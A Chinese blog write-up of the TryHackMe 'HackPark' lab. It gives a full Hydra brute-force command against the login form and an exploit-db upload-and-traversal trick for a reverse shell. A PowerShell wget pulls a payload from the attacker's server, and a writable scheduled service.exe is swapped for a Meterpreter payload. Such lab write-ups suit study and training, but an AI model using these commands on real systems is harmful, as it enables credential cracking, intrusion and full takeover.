扫描打点
一个网站,有登录界面,
THM提示用Hydra爆破bp抓一下登录的数据包:
用
hydra爆破密码,这个的语法有点怪异:1
hydra -f -l admin -P /usr/share/wordlists/wifite.txt -V 10.10.18.81 http-post-form "/Account/login.aspx:__VIEWSTATE=vSATLGgyNYOq2xRmSJZTTj%2FOcQQSMa5Gje33bS9MLeqgzac4DOJRJyDj5I6DKDz8bvBW6FngYOV%2BypIbbDdr8e18KlSmORdo%2FV4w3E%2BVJQ3U4wlyNgdoO009xmxlezA1AyOBqtDxhgbH%2F9AOXMbXAeTKcrf8hbj%2FF1v2Zdwqoliz0D6d4LdlzHPCtRjbhyaEwv0HvUcMiinZc09dqjt5sjEO%2BjUFv2wqzHHvas6J9xm8nJOxES7kvGOVlJVrOaw8B4muAci%2BwxRnANOufdMGSro20syF93U2WR2DdrChOAff%2BmG%2FqybDcgZXPESv1vSCIBG2WIddALpKQKe0PGugr%2BDipyqbrq65s1hQNLo5iYX08CaO&__EVENTVALIDATION=0E%2FrQder8Qicyb2ykUC%2Fu85a%2FZny1E5ZDp89ig9gJwY%2FJUckLJVAiFsGN7sunKnNmyGFE1on9%2Bd5pITm5PFuonsnGGtnk3OnnhoxP5iYZo9CZ81KueEz4SlKPBX4PTTP1oWp0v5JOpdEJfcTWixqf7dKC1Uhr6SdNvpXQulGAxhjZWnL&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95:F=login failed"
逐个分析:
-f是得到正确密码后停止,-l指定登录的用户名,如果是爆破用户名则是-L,-P爆破密码 ,-V显示过程,不加也行;后面是
[ip] [提交类型post/get]再后面是抓到的登录数据包,需要在其中标出
^USER^和^PASS^冒号后面是登录失败的关键词
综上,命令后面的部分类似与
[ip] [登录类型] "[数据报[登录账户参数名]=^USER^&[登录密码参数名]=^PASS^]:F=[登录错误的关键词]"
爆破出密码
1qaz2wsxmsf提权进到后台之后在
about看到版本号,exploit-db.com 找到对应漏洞:
脚本上面注释里面有使用方法:
改一下脚本里面的
ip和端口,开监听,以PostView.ascx为文件名将脚本上传到/admin/app/editor/editpost.cshtml,并且通过访问/?theme=../../App_Data/files来触发Windows提权传个
msf马先直接用网页界面上传的马没找到存放位置,就本地再
python开个服务器,让靶机用wget下载powershell -c wget "http://10.11.99.99:8000/shell/qwq.exe" -outfile "qwq.exe"注意权限问题,最好切换到
Windows/Temp目录下这里昨天的办法又不能用了THM提示我们ps看看进程但这里要引入一个新工具
winPEAS,在这里其同样用于在
Windows机器上找到可能会被攻击者利用的路径和服务。传到靶机上,注意
nc的shell看不到回显,还是要用meterpreter开个shell才行
在
Service Information里面找到这个所有人都可以读写的服务到
Program Files (x86)\SystemScheduler\Events目录下翻一翻,看到log.txt发现service.exe每30s会启动一次
由上面扫描结果得其权限是所有用户可读写,那么一个很简单的思路就是再传个马替换这个文件
直接在
meterpreter里面upload就行了
如果没传上去就是正好在被调用
flag分别在两个人的桌面上至于系统安装时间直接
systeminfo就行(逃
THM打靶日寄4-HackParl
- 本文链接: http://noone40404.github.io/2024/09/11/THM打靶日寄4:HackPark/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!